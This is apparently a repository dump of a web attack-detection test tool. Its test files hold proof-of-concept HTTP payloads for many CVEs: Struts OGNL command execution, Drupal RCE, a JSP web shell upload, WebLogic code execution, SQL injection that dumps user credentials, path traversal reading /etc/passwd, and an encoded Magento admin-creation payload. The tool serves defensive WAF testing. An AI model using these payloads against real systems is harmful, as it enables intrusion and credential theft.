/tests/CVE-2016-1182/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/foobar?key1=class['classLoader'].resources.dirContext.docBase&key2=class.classLoader.resource",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0"
7 | }
8 | },
9 | {
10 | "Method": "GET",
11 | "URI": "/foobar?key1=multipartRequestHandler['classLoader'].resources.dirContext.docBase&key2=multipartRequestHandler.classLoader.resource",
12 | "Headers": {
13 | "User-Agent": "Mozilla/5.0"
14 | }
15 | },
16 | {
17 | "Method": "GET",
18 | "URI": "/foobar?key1=resultValueMap['classLoader'].resources.dirContext.docBase&key2=resultValueMap.classLoader.resource",
19 | "Headers": {
20 | "User-Agent": "Mozilla/5.0"
21 | }
22 | },
23 | {
24 | "Method": "POST",
25 | "URI": "/",
26 | "Headers": {
27 | "User-Agent": "Mozilla/5.0",
28 | "Content-Type": "application/x-www-form-urlencoded"
29 | },
30 | "Data": {
31 | "anything": "class['classLoader'].resources.dirContext.docBase"
32 | }
33 | }
34 | ]
35 |
36 |
37 |
38 |
--------------------------------------------------------------------------------
/tests/CVE-2018-7602/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/?q=testuser/cancel&destination=testuser/cancel?q[#post_render][]=passthru&q[#type]=markup&q[#markup]=cat+/etc/passwd",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Type": "application/x-www-form-urlencoded"
8 | },
9 | "Data": {
10 | "triggering_element_name": "form_id",
11 | "form_token": "csrf-hKyeyIYxk-e4qT1sdZ6nWHq0xuHcH2BMWk3vMWaSExU",
12 | "form_id": "user_cancel_confirm_form",
13 | "op": "Cancel+account"
14 | },
15 | "Reference": "https://github.com/pimps/CVE-2018-7600"
16 | },
17 | {
18 | "Method": "POST",
19 | "URI": "/?q=file/ajax/actions/cancel/#options/path/form-hKyeyIYxk-e4qT1sdZ6nWHq0xuHcH2BMWk3vMWaSExU",
20 | "Headers": {
21 | "User-Agent": "Mozilla/5.0",
22 | "Content-Type": "application/x-www-form-urlencoded"
23 | },
24 | "Data": {
25 | "form_build_id": "form-hKyeyIYxk-e4qT1sdZ6nWHq0xuHcH2BMWk3vMWaSExU"
26 | },
27 | "Reference": "https://github.com/pimps/CVE-2018-7600"
28 | }
29 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-2618/test2.txt:
--------------------------------------------------------------------------------
1 | ------WebKitFormBoundary7MA4YWxkTrZu0gW
2 | Content-Disposition: form-data; name="shell.jsp"; filename="shell.jsp"
3 | Content-Type: false
4 |
5 | <%@ page import="java.util.*,java.io.*"%>
6 | <%
7 | %>
8 |
9 | Commands with JSP
10 |
14 |
15 | <%
16 | if (request.getParameter("cmd") != null) {
17 | out.println("Command: " + request.getParameter("cmd") + "
");
18 | Process p;
19 | if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){
20 | p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));
21 | }
22 | else{
23 | p = Runtime.getRuntime().exec(request.getParameter("cmd"));
24 | }
25 | OutputStream os = p.getOutputStream();
26 | InputStream in = p.getInputStream();
27 | DataInputStream dis = new DataInputStream(in);
28 | String disr = dis.readLine();
29 | while ( disr != null ) {
30 | out.println(disr);
31 | disr = dis.readLine();
32 | }
33 | }
34 | %>
35 |
36 |
37 |
38 | ------WebKitFormBoundary7MA4YWxkTrZu0gW--
--------------------------------------------------------------------------------
/tests/CVE-2017-9805/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/struts2-rest-showcase",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Type": "application/xml" ,
8 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
9 | },
10 | "Data-File": "test1.txt"
11 | },
12 | {
13 | "Method": "POST",
14 | "URI": "/struts2-rest-showcase",
15 | "Headers": {
16 | "User-Agent": "Mozilla/5.0",
17 | "Content-Type": "application/xml" ,
18 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
19 | },
20 | "Data-File": "test2.txt"
21 | },
22 | {
23 | "Method": "POST",
24 | "URI": "/struts2-rest-showcase",
25 | "Headers": {
26 | "User-Agent": "Mozilla/5.0",
27 | "Content-Type": "application/xml" ,
28 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
29 | },
30 | "Data-File": "test3.txt",
31 | "Reference": "https://techblog.mediaservice.net/2017/09/detection-payload-for-the-new-struts-rest-vulnerability-cve-2017-9805/"
32 | }
33 | ]
--------------------------------------------------------------------------------
/tests/CVE-2020-14882/test2.txt:
--------------------------------------------------------------------------------
1 | _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();
2 | weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();
3 | java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
4 | field.setAccessible(true);
5 | Object obj = field.get(adapter);
6 | weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);
7 | String cmd = req.getHeader("cmd");
8 | String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};
9 | if (cmd != null) {
10 | String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();
11 | weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);
12 | res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
13 | res.getServletOutputStream().flush();
14 | res.getWriter().write("");
15 | }executeThread.interrupt();
16 | ");
--------------------------------------------------------------------------------
/tests/CVE-2013-2251/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/struts2-blank/example/X.action?action:%25{3*4",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0"
7 | }
8 | },
9 | {
10 | "Method": "GET",
11 | "URI": "/struts2-showcase/employee/save.action?redirect:%25{3*4}",
12 | "Headers": {
13 | "User-Agent": "Mozilla/5.0"
14 | }
15 | },
16 | {
17 | "Method": "GET",
18 | "URI": "/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}",
19 | "Headers": {
20 | "User-Agent": "Mozilla/5.0"
21 | }
22 | },
23 | {
24 | "Method": "GET",
25 | "URI": "/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}",
26 | "Headers": {
27 | "User-Agent": "Mozilla/5.0"
28 | }
29 | },
30 | {
31 | "Method": "GET",
32 | "URI": "/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}",
33 | "Headers": {
34 | "User-Agent": "Mozilla/5.0"
35 | }
36 | }
37 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-19781/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/vpn/../vpns/portal/scripts/newbm.pl",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Accept-Encoding": "gzip, deflate",
8 | "Accept": "*/*",
9 | "NSC_NONCE": "12",
10 | "NSC_USER": "../../../netscaler/portal/templates/hzgsquvrnq",
11 | "Content-Length": "3549",
12 | "Content-Type": "application/x-www-form-urlencoded",
13 | "Connection": "close"
14 | },
15 | "Data-File": "test1.txt",
16 | "Reference": "https://github.com/trustedsec/cve-2019-19781/"
17 | },
18 | {
19 | "Method": "GET",
20 | "URI": "/vpn/../vpns/portal/hzgsquvrnq.xml",
21 | "Headers": {
22 | "User-Agent": "Mozilla/5.0",
23 | "Accept-Encoding": "gzip, deflate",
24 | "Accept": "*/*",
25 | "NSC_NONCE": "12",
26 | "NSC_USER": "hzgsquvrnq"
27 | },
28 | "Reference": "https://github.com/trustedsec/cve-2019-19781/"
29 | },
30 | {
31 | "Method": "GET",
32 | "URI": "/vpn/../vpns/cfg/smb.conf",
33 | "Headers": {
34 | "User-Agent": "Mozilla/5.0",
35 | "Accept-Encoding": "gzip"
36 | },
37 | "Reference": "https://honeydb.io"
38 | }
39 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-6340/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/drupal-8.6.9/node/200?_format=hal_json",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Type": "application/hal+json"
8 | },
9 | "Data-File": "test1.txt",
10 | "Reference": "https://github.com/oways/CVE-2019-6340"
11 | },
12 | {
13 | "Method": "POST",
14 | "URI": "/drupal-8.6.9/node/200?_format=hal_json",
15 | "Headers": {
16 | "User-Agent": "Mozilla/5.0",
17 | "Content-Type": "application/hal+json"
18 | },
19 | "Data-File": "test1.txt",
20 | "Reference": "https://github.com/oways/CVE-2019-6340"
21 | },
22 | {
23 | "Method": "GET",
24 | "URI": "/drupal-8.6.9/node/1?_format=hal_json",
25 | "Headers": {
26 | "User-Agent": "Mozilla/5.0",
27 | "Content-Type": "application/hal+json"
28 | },
29 | "Data-File": "test2.txt",
30 | "Reference": "https://www.exploit-db.com/exploits/46452"
31 | },
32 | {
33 | "Method": "POST",
34 | "URI": "/drupal-8.6.9/node/1?_format=hal_json",
35 | "Headers": {
36 | "User-Agent": "Mozilla/5.0",
37 | "Content-Type": "application/hal+json"
38 | },
39 | "Data-File": "test2.txt",
40 | "Reference": "https://www.exploit-db.com/exploits/46452"
41 | }
42 | ]
--------------------------------------------------------------------------------
/tests/CVE-2018-7600/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Type": "application/x-www-form-urlencoded",
8 | "Connection": "close"
9 | },
10 | "Data": {
11 | "form_id": "user_register_form",
12 | "_drupal_ajax": "1",
13 | "mail[#post_render][]": "exec",
14 | "mail[#type]": "markup",
15 | "mail[#markup]": "echo \";-)\" | tee hello.txt"
16 | },
17 | "Reference": "https://www.exploit-db.com/exploits/44448"
18 | },
19 | {
20 | "Method": "POST",
21 | "URI": "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax",
22 | "Headers": {
23 | "User-Agent": "Mozilla/5.0",
24 | "Content-Type": "application/x-www-form-urlencoded",
25 | "Connection": "close"
26 | },
27 | "Data": {
28 | "form_id": "user_register_form",
29 | "_drupal_ajax": "1",
30 | "mail[#post_render][]": "exec",
31 | "mail[#type]": "markup",
32 | "mail[#markup]": "php -r 'eval(base64_decode(cGhwL21ldGVycHJldGVyL3JldmVyc2VfdGNw));'"
33 | },
34 | "Reference": "https://www.exploit-db.com/exploits/44482"
35 | }
36 | ]
--------------------------------------------------------------------------------
/tests/CVE-2011-3923/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/action?foo=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%20@java.lang.Runtime@getRuntime%28%29.exec%28%27mkdir%20/tmp/PWNAGE%27%29%29%28meh%29&z[%28foo%29%28%27meh%27%29]=true",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0"
7 | },
8 | "Reference": ""
9 | },
10 | {
11 | "Method": "POST",
12 | "URI": "/",
13 | "Headers": {
14 | "User-Agent": "Mozilla/5.0",
15 | "Content-Type": "application/x-www-form-urlencoded"
16 | },
17 | "Data": {
18 | "class.classLoader.jarPath": "%28%23context[\"xwork.MethodAccessor.denyMethodExecution\"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[\"allowStaticMethodAccess\"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27netstat -an%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]"
19 | },
20 | "Reference": "https://github.com/Lucifer1993/struts-scan/blob/master/struts-scan.py"
21 | }
22 | ]
--------------------------------------------------------------------------------
/tests/CVE-2016-6195/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.tables)where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x),5,6,7,8,9,10-- -",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Connection": "close"
8 | },
9 | "Reference": "https://github.com/drewlong/vbully/blob/master/vbully"
10 | },
11 | {
12 | "Method": "GET",
13 | "URI": "/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (user)where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,password,0x3a,salt))))x),5,6,7,8,9,10-- -",
14 | "Headers": {
15 | "User-Agent": "Mozilla/5.0",
16 | "Connection": "close"
17 | },
18 | "Reference": "https://github.com/drewlong/vbully/blob/master/vbully"
19 | },
20 | {
21 | "Method": "GET",
22 | "URI": "/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (user)where (0x00) in (@x:=concat(@x,0x3c62723e,email))))x),5,6,7,8,9,10-- -",
23 | "Headers": {
24 | "User-Agent": "Mozilla/5.0",
25 | "Connection": "close"
26 | },
27 | "Reference": "https://github.com/drewlong/vbully/blob/master/vbully"
28 | }
29 | ]
--------------------------------------------------------------------------------
/tests/CVE-2020-5902/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/tmui/login.jsp..;/tmui/locallb/workspace",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Connection": "close"
8 | },
9 | "Reference": ""
10 | },
11 | {
12 | "Method": "GET",
13 | "URI": "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin",
14 | "Headers": {
15 | "User-Agent": "Mozilla/5.0",
16 | "Connection": "close"
17 | },
18 | "Reference": "https://twitter.com/x4ce/status/1279790599793545216"
19 | },
20 | {
21 | "Method": "GET",
22 | "URI": "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd",
23 | "Headers": {
24 | "User-Agent": "Mozilla/5.0",
25 | "Connection": "close"
26 | },
27 | "Reference": "https://twitter.com/x4ce/status/1279790599793545216"
28 | },
29 | {
30 | "Method": "GET",
31 | "URI": "/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/",
32 | "Headers": {
33 | "User-Agent": "Mozilla/5.0",
34 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
35 | "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
36 | "Accept-Encoding": "gzip, deflate",
37 | "Connection": "close"
38 | },
39 | "Reference": "https://github.com/jas502n/CVE-2020-5902"
40 | }
41 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-3396/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/rest/tinymce/1/macro/preview",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Accept": "text/plain, */*; q=0.01",
8 | "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
9 | "Accept-Encoding": "gzip, deflate, br",
10 | "Content-Type": "application/json; charset=utf-8",
11 | "X-Requested-With": "XMLHttpRequest",
12 | "Referer": "http://10.10.20.181/",
13 | "Content-Length": "167",
14 | "X-Forwarded-For": "127.0.0.2",
15 | "Connection": "keep-alive"
16 | },
17 | "Data-File": "test1.txt",
18 | "Reference": "https://github.com/jas502n/CVE-2019-3396"
19 | },
20 | {
21 | "Method": "POST",
22 | "URI": "/rest/tinymce/1/macro/preview",
23 | "Headers": {
24 | "User-Agent": "Mozilla/5.0",
25 | "Accept": "text/plain, */*; q=0.01",
26 | "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
27 | "Accept-Encoding": "gzip, deflate, br",
28 | "Content-Type": "application/json; charset=utf-8",
29 | "X-Requested-With": "XMLHttpRequest",
30 | "Referer": "http://10.10.20.181/",
31 | "Content-Length": "167",
32 | "X-Forwarded-For": "127.0.0.2",
33 | "Connection": "keep-alive"
34 | },
35 | "Data-File": "test2.txt",
36 | "Reference": "https://github.com/jas502n/CVE-2019-3396"
37 | }
38 | ]
39 |
--------------------------------------------------------------------------------
/tests/CVE-2019-0232/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Ccalc.exe",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0"
7 | },
8 | "Reference": "https://github.com/pyn3rd/CVE-2019-0232"
9 | },
10 | {
11 | "Method": "GET",
12 | "URI": "/cgi-bin/hello.bat?&net+user",
13 | "Headers": {
14 | "User-Agent": "Mozilla/5.0"
15 | },
16 | "Reference": "https://github.com/pyn3rd/CVE-2019-0232"
17 | },
18 | {
19 | "Method": "POST",
20 | "URI": "/cgi-bin/hello.bat?&net+user",
21 | "Headers": {
22 | "User-Agent": "Mozilla/5.0"
23 | },
24 | "Data": {
25 | "hokus": "bogus"
26 | },
27 | "Reference": "https://github.com/pyn3rd/CVE-2019-0232"
28 | },
29 | {
30 | "Method": "GET",
31 | "URI": "/cgi-bin/hello.cmd?&C%3A%5CWindows%5CSystem32%5Ccalc.exe",
32 | "Headers": {
33 | "User-Agent": "Mozilla/5.0"
34 | },
35 | "Reference": ""
36 | },
37 | {
38 | "Method": "GET",
39 | "URI": "/cgi-bin/hello.cmd?&net+user",
40 | "Headers": {
41 | "User-Agent": "Mozilla/5.0"
42 | },
43 | "Reference": ""
44 | },
45 | {
46 | "Method": "POST",
47 | "URI": "/cgi-bin/hello.cmd?&net+user",
48 | "Headers": {
49 | "User-Agent": "Mozilla/5.0"
50 | },
51 | "Data": {
52 | "hokus": "bogus"
53 | },
54 | "Reference": ""
55 | }
56 | ]
--------------------------------------------------------------------------------
/tests/CVE-2017-9805/test1.txt:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # Byte-compiled / optimized / DLL files
2 | __pycache__/
3 | *.py[cod]
4 | *$py.class
5 |
6 | # C extensions
7 | *.so
8 |
9 | # Distribution / packaging
10 | .Python
11 | build/
12 | develop-eggs/
13 | dist/
14 | downloads/
15 | eggs/
16 | .eggs/
17 | lib/
18 | lib64/
19 | parts/
20 | sdist/
21 | var/
22 | wheels/
23 | *.egg-info/
24 | .installed.cfg
25 | *.egg
26 | MANIFEST
27 |
28 | # PyInstaller
29 | # Usually these files are written by a python script from a template
30 | # before PyInstaller builds the exe, so as to inject date/other infos into it.
31 | *.manifest
32 | *.spec
33 |
34 | # Installer logs
35 | pip-log.txt
36 | pip-delete-this-directory.txt
37 |
38 | # Unit test / coverage reports
39 | htmlcov/
40 | .tox/
41 | .coverage
42 | .coverage.*
43 | .cache
44 | nosetests.xml
45 | coverage.xml
46 | *.cover
47 | .hypothesis/
48 | .pytest_cache/
49 |
50 | # Translations
51 | *.mo
52 | *.pot
53 |
54 | # Django stuff:
55 | *.log
56 | local_settings.py
57 | db.sqlite3
58 |
59 | # Flask stuff:
60 | instance/
61 | .webassets-cache
62 |
63 | # Scrapy stuff:
64 | .scrapy
65 |
66 | # Sphinx documentation
67 | docs/_build/
68 |
69 | # PyBuilder
70 | target/
71 |
72 | # Jupyter Notebook
73 | .ipynb_checkpoints
74 |
75 | # pyenv
76 | .python-version
77 |
78 | # celery beat schedule file
79 | celerybeat-schedule
80 |
81 | # SageMath parsed files
82 | *.sage.py
83 |
84 | # Environments
85 | .env
86 | .venv
87 | env/
88 | venv/
89 | ENV/
90 | env.bak/
91 | venv.bak/
92 |
93 | # Spyder project settings
94 | .spyderproject
95 | .spyproject
96 |
97 | # Rope project settings
98 | .ropeproject
99 |
100 | # mkdocs documentation
101 | /site
102 |
103 | # mypy
104 | .mypy_cache/
105 |
106 | #vscode
107 | settings.json
108 |
--------------------------------------------------------------------------------
/tests/CVE-2019-5418/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Accept": "../../../../../../../../../../etc/passwd{{"
8 | },
9 | "Reference": "https://github.com/mpgn/CVE-2019-5418"
10 | },
11 | {
12 | "Method": "POST",
13 | "URI": "/",
14 | "Headers": {
15 | "User-Agent": "Mozilla/5.0",
16 | "Accept": "../../../../../../../../../../etc/passwd{{"
17 | },
18 | "Data": {
19 | "hokus": "bogus"
20 | },
21 | "Reference": "https://github.com/mpgn/CVE-2019-5418"
22 | },
23 | {
24 | "Method": "GET",
25 | "URI": "/",
26 | "Headers": {
27 | "User-Agent": "Mozilla/5.0",
28 | "Accept": "../../.profile{{"
29 | },
30 | "Reference": "https://github.com/mpgn/CVE-2019-5418"
31 | },
32 | {
33 | "Method": "GET",
34 | "URI": "/",
35 | "Headers": {
36 | "User-Agent": "Mozilla/5.0",
37 | "Accept": "../../../../../../../../../../../../../e*c/h*s*s{{"
38 | },
39 | "Reference": "https://github.com/albinowax/ActiveScanPlusPlus/commit/979aba22796b1d0ad4b8ad948ecd004de72a2e78"
40 | },
41 | {
42 | "Method": "GET",
43 | "URI": "/",
44 | "Headers": {
45 | "User-Agent": "Mozilla/5.0",
46 | "Accept": "/tmp/web.bak.gz{{"
47 | },
48 | "Reference": "https://github.com/mpgn/CVE-2019-5418"
49 | },
50 | {
51 | "Method": "GET",
52 | "URI": "/",
53 | "Headers": {
54 | "User-Agent": "Mozilla/5.0",
55 | "Accept": "../../../../../Windows/system.ini{{"
56 | },
57 | "Reference": "https://github.com/mpgn/CVE-2019-5418"
58 | }
59 | ]
60 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # web-cve-tests
2 |
3 | [](http://makeapullrequest.com)
4 |
5 | The goal of this tool is to send PoC payloads to verify server-side attack detection solutions. If detected, the server side should return a specified HTTP status code.
6 |
7 | __This tool is not intended to actually exploit the vulnerability or to test for the existence of the vulnerability.__
8 |
9 | ## Usage
10 |
11 | Basic:
12 |
13 | ```shell
14 | ./webcve.py --url https://target-site.com
15 | ```
16 |
17 | Specify detected response code (default is 403):
18 |
19 | ```shell
20 | ./webcve.py --url https://target-site.com --status-code 406
21 | ```
22 |
23 | Verbose (output CVE descriptions):
24 |
25 | ```shell
26 | ./webcve.py --url https://target-site.com -v
27 | ```
28 |
29 | Test a single CVE (with example output):
30 |
31 | ```shell
32 | ./webcve.py --url https://target-site.com --status-code 406 --cve CVE-2017-9791 -v
33 | CVE-2017-9791
34 | The Struts 1 plugin in Apache Struts 2.3.x might allow remote code execution
35 | via a malicious field value passed in a raw message to the ActionMessage.
36 | Test passed (406)
37 | Test passed (406)
38 | Test passed (406)
39 | Test passed (406)
40 | ```
41 |
42 | Test for a group of CVEs. Groups are defined in [groups.json](groups.json).
43 |
44 | ```shell
45 | ./webcve.py --url https://target-site.com --group struts
46 | ```
47 |
48 | Test for a group type of CVEs. Types are defined in [groups.json](groups.json).
49 |
50 | ```shell
51 | ./webcve.py --url https://target-site.com --type cms
52 | ```
53 |
54 | List available groups or types.
55 |
56 | ```shell
57 | ./webcve.py --list group
58 | ```
59 |
60 | ```shell
61 | ./webcve.py --list type
62 | ```
63 |
64 | ## Contributions
65 |
66 | Pull requests are welcome. Please use the existing CVE directories as examples of how you should structure your submission.
67 |
--------------------------------------------------------------------------------
/tests/CVE-2019-2618/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/bea_wls_deployment_internal/DeploymentService",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Accept": "text/html, image/gif, image/jpeg, */*; q=.2",
8 | "Connection": "keep-alive",
9 | "username": "weblogic",
10 | "password": "weblogic",
11 | "wl_request_type": "app_upload",
12 | "wl_upload_application_name": "\\..\\tmp\\_WL_internal\\bea_wls_internal\\9j4dqk\\war",
13 | "wl_upload_delta": "true",
14 | "archive": "true",
15 | "serverName": "pyn3rd",
16 | "server_version": "10.3.6.0",
17 | "Content-Type": "multipart/form-data; boundary=---------------------------55365303813990412251182616919",
18 | "Content-Length": "982"
19 | },
20 | "Data-File": "test1.txt",
21 | "Reference": "https://github.com/pyn3rd/CVE-2019-2618"
22 | },
23 | {
24 | "Method": "POST",
25 | "URI": "/bea_wls_deployment_internal/DeploymentService",
26 | "Headers": {
27 | "User-Agent": "Mozilla/5.0",
28 | "Accept": "*/*",
29 | "Connection": "close",
30 | "username": "weblogic",
31 | "password": "Oracle@123",
32 | "wl_request_type": "app_upload",
33 | "wl_upload_application_name": "\\..\\tmp\\_WL_internal\\bea_wls_internal\\9j4dqk\\war",
34 | "wl_upload_delta": "true",
35 | "archive": "true",
36 | "serverName": "Jas502n",
37 | "server_version": "10.3.6.0",
38 | "cache-control": "no-cache",
39 | "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW",
40 | "Content-Length": "1081"
41 | },
42 | "Data-File": "test2.txt",
43 | "Reference": "https://github.com/jas502n/cve-2019-2618"
44 | }
45 | ]
46 |
--------------------------------------------------------------------------------
/tests/CVE-2015-1397/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/index.php/admin/Cms_Wysiwyg/directive",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Type": "application/x-www-form-urlencoded",
8 | "Content-Length": "1600"
9 | },
10 | "Data": {
11 | "forwarded": "1",
12 | "___directive": "%7B%7Bblock%20output%3DgetCsvFile%20type%3DAdminhtml%2FReport_Search_Grid%7D%7D",
13 | "filter": "cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKSUzQiUwQSUwQVNFVCUyMCU0MFNBTFQlMjAlM0QlMjAlRTIlODAlOUNycCVFMiU4MCU5RCUzQiUwQSUwQVNFVCUyMCU0MFBBU1MlMjAlM0QlMjBDT05DQVQoTUQ1KENPTkNBVCglMjAlNDBTQUxUJTIwJTJDJTIwJUUyJTgwJTk4MTIzJUUyJTgwJTk5KSUyMCklMkMlMjBDT05DQVQoJUUyJTgwJTk4JTNBJUUyJTgwJTk5JTJDJTIwJTQwU0FMVCUyMCkpJTNCJTBBU0VMRUNUJTIwJTQwRVhUUkElMjAlM0ElM0QlMjBNQVgoZXh0cmEpJTIwRlJPTSUyMGFkbWluX3VzZXIlMjBXSEVSRSUyMGV4dHJhJTIwSVMlMjBOT1QlMjBOVUxMJTNCJTBBJTBBSU5TRVJUJTIwSU5UTyUyMCU2MGFkbWluX3VzZXIlNjAlMjAoJTYwZmlyc3RuYW1lJTYwJTJDJTIwJTYwbGFzdG5hbWUlNjAlMkMlNjBlbWFpbCU2MCUyQyU2MHVzZXJuYW1lJTYwJTJDJTYwcGFzc3dvcmQlNjAlMkMlNjBjcmVhdGVkJTYwJTJDJTYwbG9nbnVtJTYwJTJDJTYwcmVsb2FkX2FjbF9mbGFnJTYwJTJDJTYwaXNfYWN0aXZlJTYwJTJDJTYwZXh0cmElNjAlMkMlNjBycF90b2tlbiU2MCUyQyU2MHJwX3Rva2VuX2NyZWF0ZWRfYXQlNjApJTIwVkFMVUVTJTIwKCVFMiU4MCU5OEZpcnN0bmFtZSVFMiU4MCU5OSUyQyVFMiU4MCU5OUxhc3RuYW1lJUUyJTgwJTk5JTJDJUUyJTgwJTlEZW1haWwlNDBleGFtcGxlLmNvbSVFMiU4MCU5RCUyQyVFMiU4MCU5OXlwd3ElRTIlODAlOTglMkMlNDBQQVNTJTJDTk9XKCklMkMwJTJDMCUyQzElMkMlNDBFWFRSQSUyQ05VTEwlMkMlMjBOT1coKSklM0IlMEElMEFJTlNFUlQlMjBJTlRPJTIwJTYwYWRtaW5fcm9sZSU2MCUyMChwYXJlbnRfaWQlMkN0cmVlX2xldmVsJTJDc29ydF9vcmRlciUyQ3JvbGVfdHlwZSUyQ3VzZXJfaWQlMkNyb2xlX25hbWUpJTIwVkFMVUVTJTIwKDElMkMyJTJDMCUyQyVFMiU4MCU5OVUlRTIlODAlOTklMkMoU0VMRUNUJTIwdXNlcl9pZCUyMEZST00lMjBhZG1pbl91c2VyJTIwV0hFUkUlMjB1c2VybmFtZSUyMCUzRCUyMCVFMiU4MCU5OHlwd3ElRTIl